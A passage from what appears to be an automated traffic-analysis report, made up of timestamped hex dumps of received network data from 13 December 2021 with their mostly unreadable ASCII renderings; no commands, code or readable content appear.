08 a5 83 d3 5a ee b4 54 75 b4 16 9f 60 8b b8 ee 9e d8 0b 1f a2 dd 10 91 11 97 64 5a 9d 9a 90 11 8c 54 aa fb 0a 26 8e b1 46 ff f3 0a a9 0c eb 3b 5d 7a fb 4a 30 1d
                                                                                              Data Ascii: j4=y3FXkR{?==wBCYvP?zT)R!,/=Y`$^C((Kj#(ZuSJk]eCP^R}KCDKDGj'2=R*`$MD4TWE[Ku_ZTu`dZT&F;]zJ0
                                                                                              2021-12-13 23:57:15 UTC4555INData Raw: 6f 1e d9 21 af 74 46 ff 3e 49 02 00 d3 18 fc 2c 8f 1f 9e ac 07 5e 2e 72 c3 a0 20 37 05 89 98 6c b6 50 a9 74 86 46 09 8e f6 22 d4 9f 51 44 fe ad e9 0f fe 49 79 07 fc a8 5a d1 29 3c 8a b1 aa 95 b3 9b f4 50 ea 5a bb 11 f9 0c 94 39 bb d9 29 3d c8 83 c1 44 16 84 3b 77 3c 19 fc f8 0b 8a 66 f3 56 50 8f 6d cc dc e3 27 13 b1 5a 24 74 13 dd f4 9e e1 bd 35 ca 31 f7 83 40 d6 0a 55 75 3b a8 bd 67 4e 16 ec 09 b3 14 3a 23 9a 59 98 c8 40 88 53 11 5a a1 13 67 75 30 54 04 01 52 d2 d4 2b 6f 70 ba 6e 1e 08 e7 91 a2 5e 56 74 cb c3 ae b6 9e 6e f4 04 77 0c 0d f1 9c 6c 2f 7d 4f e8 0d d0 36 bd 03 f4 16 b5 3a a1 b8 f1 ab 19 4d 78 39 02 01 96 54 f1 43 d9 48 c4 a0 c1 59 39 09 66 44 fd ee 8e d1 b4 68 00 c8 5a b5 98 9f 78 ea f6 4d 7f bd 89 ae 00 f0 e0 f2 eb 62 85 16 36 15 6d 08 1c 73
                                                                                              Data Ascii: o!tF>I,^.r 7lPtF"QDIyZ)<PZ9)=D;w<fVPm'Z$t51@Uu;gN:#Y@SZgu0TR+opn^Vtnwl/}O6:Mx9TCHY9fDhZxMb6ms
                                                                                              2021-12-13 23:57:15 UTC4571INData Raw: 5c cd c6 9b 9c c4 11 d4 d8 4b 72 87 11 75 98 7d c1 3c 24 a5 49 54 b3 e4 14 6f ab fe 37 99 f7 55 85 50 4c b8 41 68 11 bd 43 62 fc b4 85 da eb c0 88 14 8f 21 d6 9f 55 84 db 43 73 f4 fb dd db a1 cc 4c ff 69 0b 0d f2 f7 ad 22 21 d2 5a 38 43 a5 90 71 ab 69 00 34 a4 9a 21 80 fe 1e 12 be d1 86 b0 30 31 a7 8c de d9 75 82 18 70 42 16 1e 20 d3 a6 25 0e 9f bb 78 ed 6f 37 5e ab 5a d7 83 bb ac de ba 20 ce b9 64 52 aa a2 75 52 3a b3 e7 ab 91 5a 76 9c 2a f0 36 46 0f 0c 3f 44 4e da cc 25 e9 28 b1 f2 ea b4 16 7b 17 3d 04 96 7e ad 82 16 2a 63 5e d2 81 cb ed 3c be 80 7f c9 24 0b c5 85 a8 32 26 86 0e b5 dd 77 15 f3 4d b0 76 33 e0 a3 c1 7a de a4 1d 35 e1 c6 70 31 10 ff 10 7c 7d ae f3 fa 04 9b 47 50 cf 35 6a 37 73 c9 d3 4b db 68 37 4e 1a cb ac 03 93 f3 5b 9e cf 16 a2 bd e9 fa
                                                                                              Data Ascii: \Kru}<$ITo7UPLAhCb!UCsLi"!Z8Cqi4!01upB %xo7^Z dRuR:Zv*6F?DN%({=~*c^<$2&wMv3z5p1|}GP5j7sKh7N[
                                                                                              2021-12-13 23:57:15 UTC4572INData Raw: 8f 54 ff b0 5e 3c 83 48 d2 4c be 02 8d a0 84 12 93 a5 c4 85 4f c3 0a 75 41 d8 16 db 83 83 00 ea 50 87 16 44 82 be c0 57 b4 72 1d 59 6e 1d b7 ee ca 56 97 10 f5 30 f9 c3 d9 93 3d fd d0 eb 07 37 81 b3 46 65 7e 9a 4b 79 9a c4 8f e3 79 88 d4 c8 73 44 ca 0d 06 78 41 b5 7b 83 54 84 35 3e 37 a7 40 14 1a c3 ae 1d 81 3e 3a 42 e6 e8 1c f2 63 b7 fa b1 ed 15 33 8f ab 46 42 61 49 8b 1a 78 00 ee 08 40 a9 88 57 59 d7 62 6d 45 5f fa 3e a2 44 1e a6 d7 d3 49 5c 4d 73 e3 3a 0f 1d be e8 b1 bb 40 b9 4e 72 cb 34 4d 53 b2 b2 41 30 fa 81 57 fe 9c c2 32 17 d9 51 d0 86 e1 20 72 05 98 f8 0d 60 1f b4 18 0e ad b6 f1 b4 94 44 c7 60 6d 21 77 db 62 70 f7 70 65 e9 1c 44 9d c0 02 96 b3 97 cd 55 b9 e9 83 ce 7c 99 e0 36 02 42 ac f6 4b 8e 38 3c bc 07 78 9c 2b 4b e4 ad 84 59 a5 94 43 51 82 72
                                                                                              Data Ascii: T^<HLOuAPDWrYnV0=7Fe~KyysDxA{T5>7@>:Bc3FBaIx@WYbmE_>DI\Ms:@Nr4MSA0W2Q r`D`m!wbppeDU|6BK8<x+KYCQr
                                                                                              2021-12-13 23:57:15 UTC4588INData Raw: da a0 64 5b 38 a9 0e 1f 42 63 5e fa 03 ae 92 24 e2 3f 19 86 7c ca 4f ae c2 f8 22 cc c0 73 90 bb b1 65 aa 31 ec 05 74 46 9e e3 6e a2 1d 49 92 7e 40 a2 5c b0 15 fc 8a 15 a0 60 1d 13 66 de 95 0c 22 a8 56 d2 ca e7 05 ee 1c 5d 7c 7a 70 35 25 d0 33 75 a5 45 35 2a 9b 2b 87 b1 13 c6 0a c6 83 9d 94 71 11 a4 c6 e3 78 dc d4 96 61 99 43 44 46 c7 64 fc 73 08 98 4e 90 8e ef 92 0a 21 70 05 e2 2e 5f 13 2d 63 4c 40 95 6a 8e ca ea 3b 18 e1 14 e8 89 55 dc c5 e3 4b 50 65 2e 98 e1 b4 b9 86 0f 09 44 74 83 bf 70 c1 60 c9 9e 5b 99 bd f2 b2 9b f4 9d 32 39 7f 28 7e 0c 26 24 62 cb db 0f 2f e3 a4 33 a4 48 d9 00 1c f5 bd 07 e3 55 4b 3f f3 45 2f da c1 b7 aa 9f 70 de 65 5e 4a ad 53 ab 34 49 40 46 46 3c 26 29 8c 57 38 a1 12 c8 28 67 4f ee b2 0d 12 6c dd 99 0d 48 18 12 63 04 47 d2 8e bb
                                                                                              Data Ascii: d[8Bc^$?|O"se1tFnI~@\`f"V]|zp5%3uE5*+qxaCDFdsN!p._-cL@j;UKPe.Dtp`[29(~&$b/3HUK?E/pe^JS4I@FF<&)W8(gOlHcG
                                                                                              2021-12-13 23:57:15 UTC4589INData Raw: f6 fb a9 d9 21 34 0d 8e 82 64 54 0a ba 9d f5 71 40 44 2e ab 41 ec d9 41 21 81 7b f6 75 d6 e8 2e c6 f8 ba 4e 80 a4 a8 2d 83 c7 60 a3 ac b2 9c 07 c0 59 4b 6a 72 fb b6 a4 bc b1 1a 8d ca a3 bf b6 49 81 df f6 d6 ed 5e 23 93 2f 57 16 fe f8 f1 23 69 ec 8e c0 3c ed 67 33 f3 c2 70 e6 99 ec d9 76 73 68 e5 40 bd 35 d0 67 d1 dd a0 78 8d 98 3a 48 d9 28 2d 17 2f f0 93 48 7e f7 b6 6e 8d 56 75 35 d1 b2 41 26 bf ba f2 98 2b 69 70 07 0d e2 11 8a 55 ab 61 8c 95 dd 14 3b f8 f6 c2 2c df 4a e8 29 db 83 49 b8 65 5e c4 87 0e 69 a2 8d 06 3c 24 20 65 ed 3f 50 8c 62 cf e3 3a 58 e5 24 e2 22 86 0d 76 09 aa 98 9f 44 fa f7 c2 f6 ce dc f8 2a 8c 8d 08 b1 3d 9a 9d d9 4a e0 d7 f4 2f fb 72 c8 16 8e 68 89 8c 0f eb 93 6d 15 67 43 63 c6 87 06 13 52 7f 44 21 15 5b 90 c9 50 34 5b 70 6c 9c 33 e4
                                                                                              Data Ascii: !4dTq@D.AA!{u.N-`YKjrI^#/W#i<g3pvsh@5gx:H(-/H~nVu5A&+ipUa;,J)Ie^i<$ e?Pb:X$"vD*=J/rhmgCcRD![P4[pl3
                                                                                              2021-12-13 23:57:15 UTC4605INData Raw: 51 d9 92 36 ee 06 45 84 e5 72 2b 17 03 d9 0f 6b ae 53 f7 c1 69 b3 e1 14 b5 63 87 d4 33 e3 4e a4 45 f3 af f6 e8 aa 46 69 09 a4 e9 00 b6 1e e0 86 30 b7 c8 f3 fc cf 5f 74 0b 43 d6 8f df 1c 83 5f 2d 20 a7 b4 37 8b 37 c5 1d 8f 13 cd a0 81 42 87 e5 b5 a9 70 a1 e1 ca d3 38 cb ab 51 da ce 77 d3 49 22 f6 75 b8 f2 c1 1b 81 f7 2d d2 da e8 0b a2 80 74 1a 2e 2b 91 6e be 33 e7 15 02 f0 f9 2d fd 7e 4d c4 3d 7c 65 bf a6 c5 a8 9c 61 3e d2 06 bf 27 2d b4 98 59 ef d3 44 15 5c 0c 0d cf 3f 94 4b 61 53 67 8c 7a 46 59 17 30 cb 41 01 8c 13 d6 eb 3f 51 67 02 8b 06 4a e6 49 88 01 d1 50 a2 59 f4 0c fe 3a 4b dc c0 42 31 ab 47 28 3a f4 46 2d 08 41 da 6e 5f 89 d4 bd 26 21 8c 84 7b 03 09 37 bc d8 0b 9d e4 3f 2a 17 15 0f 6e 8f c5 c2 12 be 40 bc a9 1a eb b0 60 69 e9 3d 23 87 7c 13 ae 50
                                                                                              Data Ascii: Q6Er+kSic3NEFi0_tC_- 77Bp8QwI"u-t.+n3-~M=|ea>'-YD\?KaSgzFY0A?QgJIPY:KB1G(:F-An_&!{7?*n@`i=#|P
                                                                                              2021-12-13 23:57:15 UTC4606INData Raw: af 65 59 ad 0a 29 b6 dd 47 95 36 92 13 c9 30 06 37 3f c4 0c 4a 2d b2 87 b3 42 9d 6f 39 4a 4e 82 27 b2 42 24 25 dc 25 a9 55 d2 39 02 bc 87 5f 85 1a 35 25 d2 ac 5b 9c 24 1a d7 4e 8a c4 78 9d a9 64 bb a9 f1 9c b1 3e fa 18 3f 17 a4 01 0f e8 3d 61 21 2c 04 47 14 42 c1 f9 6b 73 b1 c3 46 a6 53 64 95 82 54 31 c3 25 41 e7 df 81 21 c1 5d 4d 37 28 08 15 ae f6 02 fd d6 b1 85 f8 ab af 14 37 cf f8 c2 e5 3d f3 4f 6e 01 59 93 e4 9f e0 63 84 cb d3 63 48 66 cc 0a f0 dd ac cd 53 bf 51 68 91 fd bc 4b a7 7c c5 ad e2 47 04 86 03 4c 60 67 84 eb bb 31 a9 c4 27 de 3f 8e ba 3f 8b 69 5d 53 16 96 5d 1e e0 b2 5f 4d c2 d5 a3 e2 c1 5f cd c4 70 17 09 2f ff fd b9 a1 13 05 ae c8 6f 63 17 f9 cf 02 a3 77 3e 70 5d 89 63 08 5d af c9 89 36 3d b1 64 57 ce 2f 0f 9c 93 50 5a 4a 34 23 ab 3b ce 70
                                                                                              Data Ascii: eY)G607?J-Bo9JN'B$%%U9_5%[$Nxd>?=a!,GBksFSdT1%A!]M7(7=OnYccHfSQhK|GL`g1'??i]S]_M_p/ocw>p]c]6=dW/PZJ4#;p
                                                                                              2021-12-13 23:57:15 UTC4622INData Raw: 7d 00 96 79 1b bf f5 cf 96 8a e4 05 e6 13 1a 32 0c e7 55 a6 0e a1 a5 ee 52 5d 1b 91 62 95 c0 c5 58 eb a7 f3 4f 73 5e c0 9b 98 7f af dc 40 16 df 71 03 ae 4e d4 49 31 94 9f cc 7a 69 f2 ae 62 2f 03 f0 f8 e2 a6 c4 e3 77 1e a4 96 b0 ba 80 ec d3 75 a1 be 52 f6 93 f9 b5 fe c2 02 69 71 61 67 0c 1e 34 c0 b4 6e 53 6b 75 42 15 b7 f7 4c d6 88 66 d3 3b da 63 cb 4a d2 e9 7f b9 73 5b ca 90 e7 9f bc 56 6f 08 82 21 0c 9a 34 39 68 5c 25 fe 1f 0d df d6 37 85 87 7c 57 83 6f 8a f6 93 05 f5 93 5a a8 41 94 dc 5a d9 37 c0 ca a9 6a a7 29 fa 53 d0 c0 dd e9 39 44 10 01 5a e0 87 a8 4c 48 21 26 8c 87 ab 8e 99 0d b7 dd 18 bc d9 01 15 f6 86 a3 45 66 0b 2f 98 99 28 3d 31 33 70 2b f1 bd 22 19 f8 5e 00 5c 83 77 ff 0b 5e 1b 64 19 19 9d 65 e2 79 fb ce cd 4d 27 e7 63 a4 ca 6e 1c 9e b2 5d f3
                                                                                              Data Ascii: }y2UR]bXOs^@qNI1zib/wuRiqag4nSkuBLf;cJs[Vo!49h\%7|WoZAZ7j)S9DZLH!&Ef/(=13p+"^\w^deyM'cn]
                                                                                              2021-12-13 23:57:15 UTC4623INData Raw: fb f6 e4 f2 a8 27 8b c0 87 ae 3f 90 b6 88 12 0f b7 c2 8e a7 5b 38 07 20 51 0f 39 94 be 1c d5 0d b8 9f be 1e 05 7a 7d bc 6a ba 0e 61 fd cd 29 ca b8 1e 1a f4 bd 97 ad 46 7d 66 fa a8 f2 39 e9 b4 cd 40 e7 e7 0c 17 d5 fe c8 4b ef 0b 09 ea 8d 5d 53 2c b3 ea f6 d2 ca d0 2c 18 46 6a 83 ee 98 f6 0b 56 8f 06 95 25 d6 22 9c 16 2e 5d d3 42 7c df 04 65 6d 06 92 b7 d2 a2 80 a5 17 12 a4 0d 5b 68 84 80 af fe 8f f8 03 80 b5 ae b6 8e b4 6e 14 13 77 86 5b 25 79 17 39 e7 5a 37 37 cb ff 0c f0 cd d5 53 0e 5c ad 4e 76 1b 52 2e 8b e3 06 96 b1 98 d9 66 16 f9 44 43 15 a5 7a c6 a1 ac a5 f9 9e 35 09 9a 55 52 66 0d ca b7 dc 34 f4 32 e3 14 41 c3 2d 3d 28 8e ea fc 93 4e 18 d4 6a 1b 58 0b 5a 1a 80 5d 94 3a 84 cf 27 b6 63 fa 6a 7f c3 6f b7 f5 66 ea 65 45 c8 59 3c f3 f8 b7 cb fa 33 94 b0
                                                                                              Data Ascii: '?[8 Q9z}ja)F}f9@K]S,,FjV%".]B|em[hnw[%y9Z77S\NvR.fDCz5URf42A-=(NjXZ]:'cjofeEY<3
                                                                                              2021-12-13 23:57:15 UTC4639INData Raw: d1 51 9d 22 cf 46 eb b6 03 b1 f3 7d 33 07 ef 5b 89 7c b0 1a ce 36 1d 5a 75 55 b5 81 4b 72 78 85 cd 81 c8 6e a8 42 85 a6 a9 89 c1 53 18 22 8b 64 74 b9 77 a5 e8 28 9b 74 71 a5 52 b2 3f 9d 4d 7d 00 87 59 c4 cd 8a 2c 1b 85 31 85 22 50 db b2 1b 9f 9d 30 44 81 eb de 8f 63 55 84 57 f4 4d 59 8a 3e bf e0 1d 17 fd 6b ad 03 de 14 fd f9 99 8f 37 0a 6e 7e d7 a9 65 6f ce 50 7c 07 05 b8 63 ea a5 8e 32 2a ee 5c ed 8e 1d 79 88 dd 61 a2 62 97 0d 5e 71 db d0 8b 4a ae 80 3d 12 b6 b5 4c 7b 78 af 35 13 79 9e 6b 36 08 37 f0 9d 18 c9 91 f5 d4 38 0e f3 ee 2a 5c 6c 15 e4 01 44 38 84 31 34 18 01 b6 3c 53 9b d2 fb 75 3c 2c d5 c0 45 d2 21 7d 7f 72 b1 7d e9 17 47 ee e0 f5 a8 27 ff 67 d3 8e 40 35 65 32 73 9d 68 17 f4 4c e2 e8 58 1b cf 72 33 34 80 3a c8 2d d9 ab 6a c5 25 8c 29 c0 7e 2b
                                                                                              Data Ascii: Q"F}3[|6ZuUKrxnBS"dtw(tqR?M}Y,1"P0DcUWMY>k7n~eoP|c2*\yab^qJ=L{x5yk678*\lD814<Su<,E!}r}G'g@5e2shLXr34:-j%)~+
                                                                                              2021-12-13 23:57:15 UTC4640INData Raw: 13 2e 42 fc 2c 21 e4 fd 67 d9 16 96 ce c7 3a 6c 54 87 5e 7f 88 b6 03 a2 73 60 22 46 c2 ea ac 5e 7a 8a 5e 3c 61 a6 77 7c 3a cb ef 7d 41 83 ef 4a a0 de 94 20 96 84 92 b0 9c 0d a4 a7 72 6c e8 b7 19 4a 77 e1 08 d7 08 ab 7b d9 84 07 e0 0b 8f 42 69 2a d8 55 b9 81 79 b8 d5 df 61 c6 71 7f 2e f1 34 50 a7 b2 c4 35 57 2f 52 60 49 0c 97 a7 5a fb af b7 87 11 a1 2b 42 d6 4d e0 45 a0 6f 7b e4 9b 4c a9 c4 b6 3e 58 49 07 56 94 8d e8 7a 5f 7d e2 5a e3 bb b8 b0 d3 0e aa 13 0e 67 5e e8 22 d1 a8 4f 4b 8d cb 0f 84 9f 41 a9 ab c5 bc 4e 40 fe 1a 75 37 14 54 f5 82 53 b4 13 57 65 cc da df 68 9c 20 51 6e 45 7d 66 d9 06 df c6 70 34 ae b4 45 b1 f1 4d 37 60 d4 07 a7 08 ea 6e b4 d3 54 1d 21 a1 f1 f8 0b 09 b6 56 a2 1c 8b 0b 30 29 f2 a7 e9 99 37 fa 9b e4 c3 c0 00 53 02 1f d7 93 f6 47 46
                                                                                              Data Ascii: .B,!g:lT^s`"F^z^<aw|:}AJ rlJw{Bi*Uyaq.4P5W/R`IZ+BMEo{L>XIVz_}Zg^"OKAN@u7TSWeh QnE}fp4EM7`nT!V0)7SGF
                                                                                              2021-12-13 23:57:15 UTC4656INData Raw: ab 3f 66 b1 75 5f ac 0e 41 dd 1c dd ed 54 3a 3b a4 c6 27 28 f9 9e 38 fb d5 23 74 7f f0 54 80 bb 3d 4c f1 33 5e 2c 9d f8 a1 8d a8 d3 61 25 72 da 68 5c d6 fb 30 01 33 32 53 5e 55 e4 76 90 91 91 86 74 ba 58 9b e3 30 be 36 63 36 d7 c2 c9 5a 8f 3e 14 da 92 82 26 0e 11 8a 39 7f 31 1f e2 38 9e 4f 71 b2 90 59 50 f5 1c ac ed 10 88 e2 5c 8a fa 5f b3 a9 5d 37 62 ce d7 90 c0 d1 9b 28 34 8d c1 6b 1c 78 76 44 c4 3c aa c7 52 0f 56 ef 8c 50 68 df ea 5e 65 ac a8 a6 42 a3 42 2f 4f a0 f6 e0 ee 35 24 87 45 60 29 47 a8 78 9d 84 92 0d ae 39 f9 9c 0f b4 3f 20 0a 1a f8 8b df 0b 0e e4 fe 0f 9a 25 1f 00 99 46 fc 24 ce e9 0c f8 a0 53 01 22 cb 92 b0 5b 03 d3 d5 99 10 59 28 e7 46 06 d3 c1 b7 26 5a 0c 6a 02 fd 1c c5 7a 76 e6 b1 00 58 ea a6 98 03 b0 3d 4f 2c ca 66 87 42 76 3c 68 09 a5
                                                                                              Data Ascii: ?fu_AT:;'(8#tT=L3^,a%rh\032S^UvtX06c6Z>&918OqYP\_]7b(4kxvD<RVPh^eBB/O5$E`)Gx9? %F$S"[Y(F&ZjzvX=O,fBv<h
                                                                                              2021-12-13 23:57:15 UTC4657INData Raw: a6 69 9f 91 7e 42 39 ed d6 0c a9 c7 bb bf 0b e7 43 b0 a5 5a ab bf f8 f1 52 af c3 84 30 f5 c3 b1 e3 98 50 35 4e ba 53 44 f8 f1 b0 0a 93 b9 f1 2a 41 40 c1 25 45 38 b8 1a f9 2b 8f 97 43 dd b2 2f b1 e7 ce 3f 66 92 49 81 e5 66 3a 9a a9 c9 57 e5 99 bd f7 d1 db c4 aa fe b0 db d2 d9 7e 9d c5 15 21 1b 08 d1 64 4f 57 ab 49 b9 43 9b c2 51 8c 42 a6 b8 27 75 5f 13 72 20 ca 62 d1 40 8f 18 fa 97 fe 3d c8 02 60 6a 1e 91 23 b8 c5 c1 2a 7e 4e f3 68 16 97 5f c5 9e d0 66 c0 bf 25 cf 4f 8f f4 1e a9 03 f4 c6 14 4a 81 33 20 4d 21 4d 58 13 31 54 16 94 d9 26 f9 f0 47 e3 72 91 d5 13 95 81 44 26 5a 71 59 91 3f 24 21 3d be a7 15 da 3d c1 56 4d 39 28 d4 0c 15 d0 8f 26 e9 58 c1 d3 20 d6 c3 e6 fd 31 22 77 11 e8 1f a3 c6 91 a3 6d d1 59 12 1f 78 73 e5 78 d8 c5 06 ba 54 ea ab d8 aa d1 ed
                                                                                              Data Ascii: i~B9CZR0P5NSD*A@%E8+C/?fIf:W~!dOWICQB'u_r b@=`j#*~Nh_f%OJ3 M!MX1T&GrD&ZqY?$!==VM9(&X 1"wmYxsxT
                                                                                              2021-12-13 23:57:15 UTC4673INData Raw: a6 ee 19 96 59 da b4 d5 d5 7e c0 07 0f 82 58 6e 16 e4 48 59 c9 da 62 49 81 e3 cc b5 0c d8 f4 6a af 84 15 81 23 c0 41 b1 3b d4 0a 50 12 21 86 6a 30 75 02 30 04 83 31 5d 4b ab dd 2c f3 b3 cc b6 9d e3 f7 4a 22 8a 7f 71 6d 4b 49 0c 83 67 fe 81 de 95 01 5a fa e4 27 cc 5c 3b 39 01 42 6b 18 bf 52 74 c8 d3 64 dd 9d bb a8 07 f4 d1 9f 67 cd a6 27 ef fd d5 25 86 b3 47 b9 b7 84 b5 ef c4 35 10 96 77 57 8e 30 00 fc a6 52 78 2a 86 83 65 b9 d9 6f 40 da 25 06 cb d0 f5 e7 0c a3 4d 07 79 f2 c7 66 d1 eb c3 e8 32 e0 cd f8 4e 2d 96 29 8b bf 55 b3 fe 11 73 de e3 b2 37 52 35 c5 e3 ad 9f 20 ba b2 fd f9 f5 da 03 da 3b c3 ba 1f aa a8 97 10 70 c0 70 12 f7 74 57 c1 1e 44 b4 b4 b9 cb 22 1f 40 ea 4a 04 dc 99 86 92 44 bd f7 6c f1 a1 4e d0 35 7c b8 3f 39 dc 24 d5 3f 10 10 d3 f0 f5 4f 8a
                                                                                              Data Ascii: Y~XnHYbIj#A;P!j0u01]K,J"qmKIgZ'\;9BkRtdg'%G5wW0Rx*eo@%Myf2N-)Us7R5 ;pptWD"@JDlN5|?9$?O
                                                                                              2021-12-13 23:57:15 UTC4674INData Raw: f6 a4 ff 72 06 c2 5a 3b 57 6c 21 e1 f9 9a 0b e9 a1 29 81 e7 f1 0d 8e aa 40 05 11 01 9d 98 5f 76 87 b9 9a 5e 1c c5 41 3c fa 5c d1 35 f8 8c 68 3f 17 50 8b 3e 7f 22 80 64 dd b0 76 45 ee 61 17 8c e5 6c 0a 9e 4b 1d 66 c6 7d 28 ea 42 51 de fb 85 60 57 72 49 40 6b 48 3a 21 0a 6b 20 7d 8e aa 30 72 c5 8f db 12 d5 0c 75 7d 19 12 41 75 1e 1d 4c 7c 5d 14 ad 8e 20 b5 58 d0 34 67 43 f0 d0 cc c9 2b ff 6e 89 b7 3c a3 3e 09 49 10 13 ea 1e e5 b3 61 8d fd 18 26 c1 5d b4 5d 12 cc 18 54 ef 03 ee 6e d4 4d ab 30 69 85 62 63 b0 ab 60 f8 87 b8 6a e5 17 23 0b fb 2f 60 ea be 95 d3 09 fe 6d 17 8c 76 74 45 b7 6c e0 71 28 7e 0e 6d 0e 87 8b bb 78 b0 95 ba 74 88 2d fd 19 16 65 30 b5 2e 48 10 97 f7 f0 22 93 54 dd ab 05 a4 27 02 73 f1 ab 2e 9a 76 dc 77 8a 64 5e a4 ee c0 ad 72 f4 fe ca c2
                                                                                              Data Ascii: rZ;Wl!)@_v^A<\5h?P>"dvEalKf}(BQ`WrI@kH:!k }0ru}AuL|] X4gC+n<>Ia&]]TnM0ibc`j#/`mvtElq(~mxt-e0.H"T's.vwd^r
                                                                                              2021-12-13 23:57:15 UTC4690INData Raw: c5 c9 77 83 f3 ae eb ed da d9 5b 43 9d 9b fa 9a 7b c8 1e e4 9d 8e c9 89 fb 81 09 44 17 9c 12 a1 87 c3 13 4e 11 a0 95 84 2b 17 92 5d 3d 5f aa 90 76 f0 3d f8 dd 99 6e e2 ea fb b9 0a c8 05 0f 2c 7e a0 a9 cd 71 fe 60 7e 09 cc d6 c1 27 8e 79 8c 36 0f 24 8f 2f 55 03 0d cb 86 3d c0 85 a6 5e ec ed d8 74 ae d3 b9 4f 1c 77 d9 5d 29 3e 40 b2 5d d2 d2 9c 98 42 89 d1 6c 9d 10 63 65 ed 50 39 ad ca a2 08 30 0e 24 20 74 18 04 4e 80 a5 85 ce f6 4e 2e 05 0b 76 e0 49 d8 24 6c f6 53 de 06 c4 16 5c 37 2e f9 73 b6 7c f6 15 92 62 dc 45 4b c0 39 3d 4b 6b bf 05 78 4f ab ad a3 47 2f 2c 8a 9c b2 cf bf cf ee 8a e7 14 26 0a 3b 70 30 61 8d 56 8a 5c 35 4b 1a b0 d8 3f 63 2c a5 c3 0e e4 69 3b 09 8c 16 f6 82 cd 19 08 d4 28 9d 71 b9 fa a1 c3 58 8a 28 c0 41 b6 b4 0a b6 ab de 39 70 88 e1 47
                                                                                              Data Ascii: w[C{DN+]=_v=n,~q`~'y6$/U=^tOw])>@]BlceP90$ tNN.vI$lS\7.s|bEK9=KkxOG/,&;p0aV\5K?c,i;(qX(A9pG
                                                                                              2021-12-13 23:57:15 UTC4691INData Raw: bd 79 35 7c b9 5a af 81 2b 89 e7 69 bd 31 1b 98 e9 51 73 00 d7 27 92 82 b5 df af 2c 95 78 f6 53 94 cf 30 2d 0f 4e 77 0e 67 c9 71 7d 00 9b 06 5b b9 32 20 b0 b4 62 4d 8b 42 99 e4 95 3e fe 24 22 2b 2d 51 7e cf f0 0a ea f7 bd 60 33 da 18 da 17 91 5b 75 60 31 26 54 57 c0 40 38 43 9d ce cc 38 1c d8 12 63 83 b9 35 cf fe c2 2b 4f 47 78 ba a0 30 4c f7 b5 2a 00 ae 75 ac 88 c6 6e 90 5f 58 f8 f4 e3 2f bd d0 20 f2 49 cf 03 c4 38 20 13 78 1c 49 5a c9 4c 38 60 36 91 e2 65 b2 30 63 b1 f9 94 7d 26 f8 08 d5 02 39 0c c4 66 42 2e 3b 3f 4d d8 c4 5d ae aa 3a 70 81 73 8e 2e 33 d4 30 8a 50 fc ad 12 d5 c7 a8 a9 24 27 14 eb 64 aa f4 54 20 f8 97 e2 4c dd 1a f6 47 08 8a 59 d5 38 64 88 20 75 c9 dd bc 84 df c4 94 62 13 e3 b7 7d 1a 1a 93 43 5b 94 8c f3 ac 42 4b 71 3c 80 e1 fd c6 55 d0
                                                                                              Data Ascii: y5|Z+i1Qs',xS0-Nwgq}[2 bMB>$"+-Q~`3[u`1&TW@8C8c5+OGx0L*un_X/ I8 xIZL8`6e0c}&9fB.;?M]:ps.30P$'dT LGY8d ub}C[BKq<U
                                                                                              2021-12-13 23:57:15 UTC4707INData Raw: 1d b5 02 09 37 5d a5 71 ec 70 05 59 2d 86 60 97 11 ef 0e 6e c5 b4 61 08 53 20 17 95 c4 33 3d d4 e8 6f 43 82 3d 61 a4 92 90 60 85 9c be ee 57 6a 80 49 44 09 b6 af 2b 2f fa f6 2d 3a 82 d4 9a c2 07 6b 3e 4b 69 9f f0 e9 38 e9 3e ab a2 d2 9c f0 c2 84 19 b4 b6 a2 86 02 0f 5f d3 85 4a e8 d1 cd cd dc 96 41 a2 64 9e 05 da c0 d8 d7 dd 31 33 bf da af 8f ae 87 f3 7c da 4f 24 b9 c9 66 7b e9 74 13 ed 50 a3 1e 4a 29 8d 9e 1c 94 b8 3b 47 22 9f d7 13 ec 9b 6b 6d 03 61 d7 2b 65 4f a6 57 27 97 4b 5a 8a 74 c1 15 88 a8 70 17 56 2d 36 b6 5c 0a 9e 5c 74 03 07 88 2e 36 b7 d9 10 89 20 2a fe 84 6d 08 7b 2d 35 62 6d 23 15 1f fe b7 6e 0f 1b 0b d8 82 a4 5f 3c d7 42 da 36 b5 f1 9e 26 b4 04 f1 09 20 ce 57 51 01 00 78 6b c8 47 5b 8b af a0 3b 77 db 63 d5 0a 88 7a 53 01 81 4f 1e 78 8e 34
                                                                                              Data Ascii: 7]qpY-`naS 3=oC=a`WjID+/-:k>Ki8>_JAd13|O$f{tPJ);G"kma+eOW'KZtpV-6\\t.6 *m{-5bm#n_<B6& WQxkG[;wczSOx4
                                                                                              2021-12-13 23:57:15 UTC4708INData Raw: 21 c5 bc 67 c8 00 5a ad 34 cf 5e 27 00 8b 45 13 72 56 41 f2 7c f3 e4 74 3f ac 23 94 23 86 00 1a 95 29 8b 47 68 8e 9b d2 bb fa 18 35 32 d6 97 28 a0 31 0c 21 54 7b 15 f2 74 dc 98 51 48 51 5a e6 2c b2 3b 7f 74 df 89 fe c2 9e 72 50 42 bc 50 db 42 f7 91 be ec 68 0e 6f 84 c5 62 e2 af 70 ee a1 c3 ec a1 d8 f2 a4 85 87 be 6c ea 1f e5 e8 e1 62 05 0c 69 a5 b4 3b a8 b5 67 30 b6 5b c3 12 7d 46 9c 58 00 76 f6 b2 fc e7 dd 22 d5 98 e0 2d d7 50 29 c2 d5 9a c4 df f3 06 fa 17 35 42 c3 5c e0 68 9d e8 51 79 50 aa 9a 96 9e 39 96 80 59 c9 9a c2 d0 41 c8 c7 62 29 5b 94 0f 7a e7 ec a3 be 23 25 36 0d 95 78 1b 01 7e 17 a8 49 e5 80 8d c6 c9 2a 5b d8 9f c8 03 4d 0c 16 4c 6e 89 77 db e6 60 9e 57 80 e6 22 4c e0 db ad ce d6 15 66 e3 4e a8 5c 22 79 fe 33 a2 15 20 a5 fe 2e 89 f2 59 0f 54
                                                                                              Data Ascii: !gZ4^'ErVA|t?##)Gh52(1!T{tQHQZ,;trPBPBhobplbi;g0[}FXv"-P)5B\hQyP9YAb)[z#%6x~I*[MLnw`W"LfN\"y3 .YT
